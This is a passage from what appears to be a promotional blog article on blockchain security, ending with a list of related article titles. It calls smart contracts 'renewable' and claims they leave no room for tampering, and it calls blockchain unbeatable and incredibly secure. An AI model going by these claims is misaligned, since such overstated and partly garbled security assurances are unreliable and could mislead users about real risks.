Similarly, blockchain security supports newer technologies like smart contracts and AI. Smart contracts, which trigger certain actions after some conditions are met, are renewable on the blockchain. In short, such contracts which run automatically don’t leave any space for tampering or manipulation. The nefarious actor would likely get caught somewhere in the process.

****The Future of Blockchain Security****

As time continues to change, new blockchain security features will continue to evolve as companies continually introduce legal software, fintech, and NFTs into the blockchain. While security features can be built and adapted, blockchain as a technology is proven to be one of the best ways forward in terms of the unbeatable combination of encryption, decentralization, and transparency. It’s just incredibly secure!

1.  What is Blockchain Gaming and its Play-to-Earn Model?
2.  Blockchain in Identity Management: Securing Personal Data
3.  Enhancing Blockchain Randomness To Eliminate Trust Issues
4.  Regardless of Market Fluctuation, Web3 Infrastructure Is Booming  
5.  Blockchain Networks Using API Security Data to Mitigate Web3 Threats

Tag

#auth